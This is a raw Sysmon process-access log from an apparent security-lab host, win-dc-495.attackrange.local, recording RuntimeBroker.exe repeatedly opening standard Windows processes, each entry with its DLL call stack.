13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7D00-00000000A301}4172C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7D00-00000000A301}4172C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
